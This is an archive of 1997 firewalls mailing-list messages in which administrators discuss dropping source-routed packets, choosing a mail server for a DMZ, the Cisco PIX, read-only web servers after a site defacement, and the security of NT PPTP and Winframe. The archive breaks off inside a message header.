Sat Jan 4 16:29:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA08204 for firewalls-outgoing; Sat, 4 Jan 1997 16:17:14 -0800 (PST) Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA08197 for ; Sat, 4 Jan 1997 16:17:07 -0800 (PST) Received: from wintermute.marievik.findata.se by mail.swip.net (8.6.8/3.01) id BAA07400; Sun, 5 Jan 1997 01:16:36 +0100 Received: from wintermute.marievik.findata.se (ckn@wintermute.marievik.findata.se [192.71.39.5]) by wintermute.marievik.findata.se (8.6.4/8.6.4) with SMTP id BAA22991 for ; Sun, 5 Jan 1997 01:16:34 +0100 Date: Sun, 5 Jan 1997 01:16:33 +0100 (MET) From: Carl Karlsson X-Sender: ckn@wintermute.marievik.findata.se Reply-To: Carl Karlsson To: firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: <3.0.32.19970104111733.006caf34@lint.cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 4 Jan 1997, Paul Ferguson wrote: > At 09:43 AM 1/4/97 -0600, Peter da Silva wrote: > > >> Please correct me if I'm wrong here but I was under the impression that > >> the 192.168.x.x-addresses was 'non-routable' or whatever the term is. > >> Under what circumstances can an external intruder gain access to my > >> internal 192.168.x.x-machines? > > > >Source routed packets. > > Which are easily stopped. You guys have a cool terse way of discussing interesting things. :) I was thinking that source routed packets was the answer to my question, and I was also believing that they could be stopped. Do I need to care about source routed packets if my upstream provider has everything configured as they should? If I am using for example Linux, would it be enough to configure the linux kernel to drop source routed packets? To configure the linux firewall to ignore localnet packets from the external link? Many questions.. I'll accept an RTFM answer if someone also tells me WTFM is. :) Calle From firewalls-owner Sat Jan 4 17:23:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10353 for firewalls-outgoing; Sat, 4 Jan 1997 17:02:02 -0800 (PST) Received: from mail.u-net.net (mail.u-net.net [194.119.128.80]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10346 for ; Sat, 4 Jan 1997 17:01:50 -0800 (PST) Received: from mint.u-net.com ([193.119.188.245]) by mail.u-net.net with ESMTP id <40977-7806>; Sun, 5 Jan 1997 00:57:34 +0000 From: "Mr. S Armitage" To: Subject: Slow down Date: Wed, 1 Jan 1997 14:09:59 -0000 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <97Jan5.005734+0000_gmt.40977-7806+30@mail.u-net.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi your service is great but I'm getting that much mail I don't have time to read it. I already have at least fifty unread firewalls digest. So would it be possible to remove my name from the mailing list and give me time to catch up. Thanks armo@mint.u-net.com ---------- From firewalls-owner Sat Jan 4 17:29:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10273 for firewalls-outgoing; Sat, 4 Jan 1997 17:00:50 -0800 (PST) Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA10264 for ; Sat, 4 Jan 1997 17:00:41 -0800 (PST) Received: (qmail 13766 invoked from smtpd); 5 Jan 1997 01:00:16 -0000 Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 5 Jan 1997 01:00:16 -0000 Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id TAA21833; Sat, 4 Jan 1997 19:00:16 -0600 Received: by sonic.nmti.com; id AA02172; Sat, 4 Jan 1997 19:00:10 -0600 From: peter@baileynm.com (Peter da Silva) Message-Id: <9701050100.AA02172@sonic.nmti.com.nmti.com> Subject: Re: Re[2]: NT NAT To: ckn@findata.se Date: Sat, 4 Jan 1997 19:00:09 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Do I need to care about > source routed packets if my upstream provider has everything configured > as they should? Yes. Don't depend on a third party maintaining a configuration correctly for the proper operation of your firewall. > If I am using for example Linux, would it be enough to > configure the linux kernel to drop source routed packets? I don't know. It's a sysctl option in FreeBSD. From firewalls-owner Sat Jan 4 17:36:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09845 for firewalls-outgoing; Sat, 4 Jan 1997 16:55:21 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA09815 for ; Sat, 4 Jan 1997 16:55:10 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by lint.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id QAA25824; Sat, 4 Jan 1997 16:54:10 -0800 (PST) Message-Id: <3.0.32.19970104195407.006c3e84@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 04 Jan 1997 19:54:09 -0500 To: Carl Karlsson From: Paul Ferguson Subject: Re: Re[2]: NT NAT Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Apologies for the terseness. :-) I certainly wouldn't rely on my upstream service provider to block source-routed traffic; normally, they don't care. In fact, they generally support it to troubleshoot routing problems [ie. traceroute -g option]. I can't speak to kernel or OS modifications (since I'm an old router jockey anyway), but source-routed IP packets can be easily dropped on a cisco router by adding the global parameter: no ip source-route to the router configuration. - paul At 01:16 AM 1/5/97 +0100, Carl Karlsson wrote: >> >Source routed packets. >> >> Which are easily stopped. > >You guys have a cool terse way of discussing interesting things. :) I was >thinking that source routed packets was the answer to my question, and I >was also believing that they could be stopped. Do I need to care about >source routed packets if my upstream provider has everything configured >as they should? If I am using for example Linux, would it be enough to >configure the linux kernel to drop source routed packets? To configure the >linux firewall to ignore localnet packets from the external link? >Many questions.. I'll accept an RTFM answer if someone also tells me WTFM >is. :) > -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Jan 4 17:44:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10785 for firewalls-outgoing; Sat, 4 Jan 1997 17:09:42 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA10778 for ; Sat, 4 Jan 1997 17:09:30 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vgh4Y-0004FgC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:08:22 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Sun, 5 Jan 97 02:08 MET Received: by lina id m0vggy9-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 02:01:45 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: Re[2]: NT NAT To: ckn@findata.se Date: Sun, 5 Jan 1997 02:01:44 +0100 (MET) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Carl Karlsson" at Jan 5, 97 01:16:33 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > Do I need to care about > source routed packets if my upstream provider has everything configured > as they should? Ask your upstream providee, how should we know if he is filtering source routed packets? You can drop them at your router which links you to the outside world. Use fireeall rules or settings like "drop source routed frames"with linux. > If I am using for example Linux, would it be enough to > configure the linux kernel to drop source routed packets? To configure the > linux firewall to ignore localnet packets from the external link? Both. And to ignore PAckates from your internal net as the source on external interfaces. And ignore packates with internal address as source on external interface and so on. This will prevent you from IP-Spoofing and will block most simple attacks. Greetings Bernd y From firewalls-owner Sat Jan 4 19:34:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18678 for firewalls-outgoing; Sat, 4 Jan 1997 19:13:04 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18671 for ; Sat, 4 Jan 1997 19:12:57 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00477; Sat, 4 Jan 1997 21:14:21 -0600 Date: Sat, 4 Jan 1997 21:06:27 -0600 (CST) From: Ron DuFresne To: Peter da Silva cc: ckn@findata.se, firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: <9701050100.AA02172@sonic.nmti.com.nmti.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At least the 2.0.x kernals and newer have this as a config option when you rebuild the kernel... Later, Ron DuFresne On Sat, 4 Jan 1997, Peter da Silva wrote: > > Do I need to care about > > source routed packets if my upstream provider has everything configured > > as they should? > > Yes. Don't depend on a third party maintaining a configuration correctly > for the proper operation of your firewall. > > > If I am using for example Linux, would it be enough to > > configure the linux kernel to drop source routed packets? > > I don't know. It's a sysctl option in FreeBSD. > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Sat Jan 4 19:47:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18798 for firewalls-outgoing; Sat, 4 Jan 1997 19:14:32 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA18791 for ; Sat, 4 Jan 1997 19:14:19 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id VAA00489; Sat, 4 Jan 1997 21:15:49 -0600 Date: Sat, 4 Jan 1997 21:07:59 -0600 (CST) From: Ron DuFresne To: Bernd Eckenfels cc: ckn@findata.se, firewalls@GreatCircle.COM Subject: Re: Re[2]: NT NAT In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk And for the 2.0.x kernels there is a patch to help control syn floods... Later, Ron DuFresne On Sun, 5 Jan 1997, Bernd Eckenfels wrote: > Hello, > > > Do I need to care about > > source routed packets if my upstream provider has everything configured > > as they should? > > Ask your upstream providee, how should we know if he is filtering source > routed packets? You can drop them at your router which links you to the > outside world. Use fireeall rules or settings like "drop source routed > frames"with linux. > > > If I am using for example Linux, would it be enough to > > configure the linux kernel to drop source routed packets? To configure the > > linux firewall to ignore localnet packets from the external link? > > Both. And to ignore PAckates from your internal net as the source on > external interfaces. And ignore packates with internal address as source on > external interface and so on. This will prevent you from IP-Spoofing and > will block most simple attacks. > > Greetings > Bernd > y > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Sat Jan 4 21:29:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA24739 for firewalls-outgoing; Sat, 4 Jan 1997 21:20:29 -0800 (PST) Received: from exon.massart.mass.edu ([134.241.139.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA24725 for ; Sat, 4 Jan 1997 21:20:21 -0800 (PST) Received: (from paonia@localhost) by exon.massart.mass.edu (8.7.5/8.7.3) id AAA15351; Sun, 5 Jan 1997 00:19:56 -0500 From: Paonia Ezrine Message-Id: <199701050519.AAA15351@exon.massart.mass.edu> Subject: which mta 4 dmz To: firewalls@greatcircle.com Date: Sun, 5 Jan 1997 00:19:56 -0500 (EST) Cc: mick@janis.massart.edu, mbrodsky@phx.com (Michael Brodsky) Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am tring to deside which mta do use on the external mail machine. I am thinking about these 1. sendmail 8.8.4 2. zmailer 2.9.44.1 3. qmail 0.95 4. exim what are people using. What would you sugject pros/conns? thanks paonia From firewalls-owner Sun Jan 5 16:44:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA24259 for firewalls-outgoing; Sun, 5 Jan 1997 16:26:12 -0800 (PST) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA24219 for ; Sun, 5 Jan 1997 16:25:49 -0800 (PST) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0vh2sS-0004IVC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 6 Jan 1997 01:25:20 +0100 (MET) Received: from lina (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Mon, 6 Jan 97 01:25 MET Received: by lina id m0vgvHH-0004ixC (Debian Smail-3.2 1996-Jul-4 #2); Sun, 5 Jan 1997 17:18:27 +0100 (MET) Message-Id: From: lists@lina.inka.de (Bernd Eckenfels) Subject: Re: which mta 4 dmz To: paonia@exon.massart.mass.edu (Paonia Ezrine) Date: Sun, 5 Jan 1997 17:18:27 +0100 (MET) Cc: firewalls@greatcircle.com, mick@janis.massart.edu, mbrodsky@phx.com In-Reply-To: <199701050519.AAA15351@exon.massart.mass.edu> from "Paonia Ezrine" at Jan 5, 97 00:19:56 am X-Mailer: ELM [version 2.4 PL25 PGP2] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, > I am tring to deside which mta do use on the external mail machine. I am > thinking about these > 1. sendmail 8.8.4 Medium PErformance -Full of Bugs, complicated sendmail.cf. +Good for rewriting Headers, well known. Could be run as non-priveleged user > 2. zmailer 2.9.44.1 Mem consuming -Complicated to configure +Lot of features, IMHO unstable. Not sure about security. > 3. qmail 0.95 Network consuming -no bang path support, uncommon +fast, secure, easy to set up, usefull features > 4. exim Hmm..dont have much infos about that -no bang path support +fast and usefull features 5. smail Medium Performance -complicated in high traffic situations +easy to set up. Not much bugs are known. Can run as unpriveleged relay. 6. smap/smapd Mail Proxy only. -Needs another MTA behind itself. Does not much Header sanity +small program (which doesnt do much :) 7. smtpd/forwd Mail Proxy only -Needs another MTA. +small program which does fairly good header data checks. Personally I would eighter use smail or qmail, depending on the tasks which are needed to be carried out. Greetings Bernd PS: for smap smtpd see http://www.inka.de/sites/lina/freefire-l/ -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From firewalls-owner Sun Jan 5 20:29:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA04687 for firewalls-outgoing; Sun, 5 Jan 1997 20:16:53 -0800 (PST) Received: from email.acsinc.net ([206.156.73.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA04677 for ; Sun, 5 Jan 1997 20:16:42 -0800 (PST) Received: from keith.acsinc.net (arisiasoft.acsinc.net [206.156.73.34]) by email.acsinc.net (Netscape Mail Server v1.1) with ESMTP id AAA63 for ; Sun, 5 Jan 1997 23:16:41 -0500 From: keithstevens@acsinc.net (Keith Stevens) To: Subject: Cisco PIX Date: Sun, 5 Jan 1997 23:13:35 -0500 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19970106041640725.AAA63@keith.acsinc.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there a bastion host / proxy server that out-performs Cisco's PIX in throughput? Security? Ease of implementation? >From my limited perspective as a newbie, the Cisco PIX in combination with a good screening router is a very good firewall. Not to be a wise guy, I'm seriously asking, with this technology available, is there ever a reason to build one from scratch? I might be able to do it cheaper - but if it takes a couple weeks or a month to do It might cost more. I'm not in any way affiliated with Cisco. KeithStevens keith@acsinc.net From firewalls-owner Sun Jan 5 23:06:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA09504 for firewalls-outgoing; Sun, 5 Jan 1997 21:52:20 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09470 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:51:49 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA17474 for ; Tue, 31 Dec 1996 13:01:58 -0800 (PST) From: uskanbye@ibmmail.com Message-Id: <199612312101.NAA17474@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 3767; Tue, 31 Dec 96 16:01:20 EST Date: Tue, 31 Dec 1996 16:00:41 EST To: firewalls@greatcircle.com X-Sender-Info: Mitchell Ummel CSP CCP, KDHE Network Manager Office of Information Systems, Tech Services Section MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Re: Air Force Web Site Hacked Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't agree with premise that a CD-ROM based WWW server is a viable option. Unless your web site is very static (no databases, no HTML generation, no frequent updates?), this would be cumbersome indeed, and still NO guarantee against hacking. Case in point... unless your DNS server is also "CD-ROM based" as well (a silly proposition), a hacker can always point your WWW server domain name to another "hacked" IP address. Physical read-only storage may offer SOME protection, but still not hackproof (not to mention the probable performance penalty you'd pay for optical). ----------------WWW.INK.ORG\PUBLIC\KDHE------------------- --------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- ----------Mills Bldg Suite 501 Topeka, KS 66612----------- ---------Phone (913) 296-5643 FAX (913) 296-8943---------- *** Forwarding note from I5004693--IBMMAIL 12/31/96 15:42 *** Date: Tue, 31 Dec 1996 11:41:27 -0800 From: Mark Johnson To: Dale Drew CC: Michael Idengren , Christopher Klaus , firewalls@GreatCircle.COM Subject: Re: Air Force Web Site Hacked Dale Drew wrote: > > I don't see how CDROM provides significant advantages on a WEB server > "graffiti" attack. > > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT (or the user that owns > the http process), and the system has some form of (or access to) > writable media available. > > The attacker just repoints the httpd root tree to the writable media (eg; > "/tmp") and away from the CDROM. > > http://www.security.mci.net > =============================================================== > Dale Drew MCI Telecommunications > Sr. Manager internetMCI Security > Engineering > Voice: 703/715-7058 Internet: ddrew@mci.net > Fax: 703/715-7066 MCIMAIL: Dale_Drew/644-3335 > > At 11:57 PM 12/30/96 -0500, Michael Idengren wrote: > >I don't know about the rest of you but I agree with the idea of putting a > >webserver on a CD-ROM. I think the government can afford to write a new > >CD every time they need to update someone's email address anyways :) > > > >Mike Idengren | MEISTER > >---------------------------------+---------------------------------- > >Center for Information Technology| Alachua Free-Net IRC Administrator > >Stetson University | WorldWide Free-Net IRC Network Coordinator > > > > > > > > > > I have not set one up yet(Planned for July), but I believe you can have a totally CDROM machine, at least using Novell or NT. Bootable CDROMs and all data on CDROM so you would not have any writable media. Can anyone confirm of deny my thoughts? Mark -- Mark Johnson Network Project Manager St. Mary's Regional Med Ctr mark@hercules.reno.nv.us ---- End of mail text Additional SMTP headers from original mail item follow: Received: from relay1.UU.NET by ibmmail.COM (IBM VM SMTP V2R3) with TCP; Tue, 31 Dec 96 15:43:03 EST Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQbwna15264; Tue, 31 Dec 1996 15:42:24 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-9604 17-1) id LAA12757 for firewalls-outgoing; Tue, 31 Dec 1996 11:35:24 -0800 (PST) Received: from heather.greatbasin.com (heather.greatbasin.com [140.174.194.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA12750 for ; Tue, 31 Dec 1996 11:35:17 -0800 (PST) Received: from marks (hercules.reno.nv.us [204.94.161.224]) by heather.greatbas in.com (8.8.4/8.7.3) with SMTP id LAA14508; Tue, 31 Dec 1996 11:34:30 -0800 (PS T) Message-ID: <32C96C67.7D78@hercules.reno.nv.us> X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 References: <3.0.32.19961231124626.007717e4@166.45.1.38> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Sun Jan 5 23:18:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA11469 for firewalls-outgoing; Sun, 5 Jan 1997 22:16:45 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id VAA09528 for firewalls@greatcircle.com; Sun, 5 Jan 1997 21:52:32 -0800 (PST) Received: from odin.cmp.ilstu.edu (odin.cmp.ilstu.edu [138.87.1.13]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA17297 for ; Wed, 1 Jan 1997 14:43:08 -0800 (PST) From: mrwilhe@odin.cmp.ilstu.edu Received: from hawkins-13.isbe.state.il.us by odin.cmp.ilstu.edu (AIX 4.1/UCB 5.64/4.03) id AA15722; Wed, 1 Jan 1997 16:42:12 -0600 Message-Id: <1.5.4.32.19970101224653.008ff9d0@odin.cmp.ilstu.edu> X-Sender: mrwilhe@odin.cmp.ilstu.edu X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 16:46:53 -0600 To: firewalls@GreatCircle.COM Subject: airfhack--secure/hacked web server Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On the idea of the ram mem--it would have to be something special--only changed by physical means(rebooting?)--one could not inflict something of non-physical forces to change the ram. (sorta like bios holding a passwd--you can clear the password by taking the chip out -- yes i know there are ways around this, but something similar for the ram mem/disk would suffice to keep it from being hacked. Another statement that was brought up was that cd-rom or other write once or a physical write lock on the hard drive(hd prob more practical) would being able to change the page often-- my statement i made at first was meant for only sites that don't change there pages often -- not pages such as www.news.com. I don't believe that the main pages of the cia/dia/fbi/nsa/ni/and other sites that hold stats..... change there pages that often. fsh <<>> The following are some of the major points made on this subject (sorry if i left out some). "Seriously: why not just put it on a separate disk which is mounted > read-only? If you want to go further, you could buy a suitable harddisk > which can be write-locked by hardware. regards:jamie" " The Web server would have to be based on all write once media -- from the > Operating systems and all other aspects, otherwise the attacker would just > redirect the homepage contents to a hard drive. Doesn't matter, I could just launch a server that redirected you to a site with the content mirrored and altered, or serve the pages out of memory, or off of RAM disk." From: "Paul D. Robertson" "A CD-ROM -based web server would be fine if you created web pages, pressed a CD, and then never again expected to add/delete/modify the content. But this is The Real World (tm)." Mark Johnson "Not to disagree with anything Paul has said, because I don't, but the original premise was government web sites not high volume web sites. How often does the Air Force's web pages need to change? Not too often I would wager, they don't *need* re-visits, they don't have advertising (at least I would expect they don't, I haven't checked actually), they are there just to provide some mostly static information. Given that, I think there is merit to a write-once media approach. But not, as Paul and others point out, as a general solution." Dave Kinchlea [from Michael Idengren:] > I don't know about the rest of you but I agree with the idea of putting a > webserver on a CD-ROM. [from Thomas Leitner:] > why not just put it on a separate disk which is mounted > read-only? [from Dale Drew:] > Using a CDROM web-server doesn't provide resistance to an > attacker who gains access to the system as ROOT... Keep in mind that this entire thread assumes that the attacker will *not* take an easier approach, such as compromising the DNS records that point to the server. In this case, the attacker can create any web content they like, spend all the time in the world creating it, and then quickly convince the DNS servers that www.foo.com now resolves to the new (fake) address. Securing your www server is just a first (although important) step. I do think read-only media is an interesting idea, by the way :) Dale is right though, there are still vulnerabilities. Personally, I like the idea of marking the files immutable myself. This way, even root can't change the content unless the machine is brought down into single-user mode. Not sure how many other operating systems support this other than (the great) BSDI though. Happy new year (2 minutes to go...), Norm 1. My comment was partially meant as a joke, it's horribly impractical for ISP's and Univerisities and such to require operator intervention every time a webpage needs to be updated. Such a level of paranoia *might* only be appropriate for government agencies and authoritative advanced research sites. From: Michael Idengren From firewalls-owner Mon Jan 6 00:14:13 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA17243 for firewalls-outgoing; Sun, 5 Jan 1997 23:56:58 -0800 (PST) Received: from imc.eyron.com (mail.eyron.com [192.116.223.180]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA17212 for ; Sun, 5 Jan 1997 23:56:39 -0800 (PST) Received: by imc.eyron.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFBB7.CC993440@imc.eyron.com>; Mon, 6 Jan 1997 09:55:51 +0200 Message-ID: From: Dov Sharon To: "'firewalls@greatcircle.com'" Subject: Windows NT PPTP Date: Mon, 6 Jan 1997 09:56:24 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Does anybody know how secure is the PPTP service provided with Windows NT 4.0 in establishing VPN across the internet. Are there any known security holes when using this service ? Thanks Dov Sharon System Admin Eyron Ltd. From firewalls-owner Mon Jan 6 00:29:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18163 for firewalls-outgoing; Mon, 6 Jan 1997 00:15:01 -0800 (PST) Received: from malraux.matranet.com (malraux.matranet.com [194.117.213.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA18153 for ; Mon, 6 Jan 1997 00:14:42 -0800 (PST) Received: (from uucp@localhost) by malraux.matranet.com (8.7.4/8.7.3) id JAA07370; Mon, 6 Jan 1997 09:03:55 +0100 (MET) Received: from verlaine.imatranet.com(192.0.2.2) by malraux.matranet.com via smap (3.2) id xma007366; Mon, 6 Jan 97 09:03:38 +0100 Received: from kafka.imatranet.com ([192.0.2.22]) by verlaine.imatranet.com (post.office MTA v2.0 0813 ID# 0-29132U60) with ESMTP id AAA228; Mon, 6 Jan 1997 09:12:19 +0100 From: "Xavier Fauquet" To: "Jamie Thain" , "Mike Bernhardt" , "Ralph Docken" , , "Chris Lonvick" Subject: Re: Using Remote Workstation as Hole?? Date: Mon, 6 Jan 1997 00:49:13 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-ID: <19970106081219047.AAA228@kafka.imatranet.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Could someone points me to a site explaining me what is Winframe ? Thanks ---------- > From: Jamie Thain > To: Mike Bernhardt ; Ralph Docken ; Firewalls@GreatCircle.COM; Chris Lonvick > Subject: Re: Using Remote Workstation as Hole?? > Date: mercredi 1 janvier 1997 01:12 > > Chris, > > > I don't want to seem altogether pessimistic on the subject - but I do > think > > that a very determined person can crack any system, given enough time. > Even > > Mike's systems are not invulnerable. It would just take a very > determined > > person to get through his defenses - using electronic means. > > I agree, however what if you put a machine like a Winframe in your DMZ, and > force all outside connections through that machine. The Winframe uses a > propriatary protocol ICA, that is encrypted, and then encrypting the > outside machine stream. Winframe can be configured such that it auto > disconnects, has no virtual resources other than a screen, and requires the > client to logon 100% of the time. Although the password is passed accross > the wire, if it is in a VPN there is effectively three layers of > scrambling/encryption at that point. > > The protocol ICA > The Winframe encryption, > The protocol encryption. > > But there is always the cold war method... hold a gun to the person's head > on the outside, while they retrieve data from the machine, or steal the > tapes... ... > > Comments on the security of Winframe? > > regards:jamie From firewalls-owner Mon Jan 6 00:44:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18536 for firewalls-outgoing; Mon, 6 Jan 1997 00:26:28 -0800 (PST) Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA18522 for ; Mon, 6 Jan 1997 00:25:51 -0800 (PST) Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id QAA18062; Mon, 6 Jan 1997 16:24:31 -0800 Date: Mon, 6 Jan 1997 16:24:31 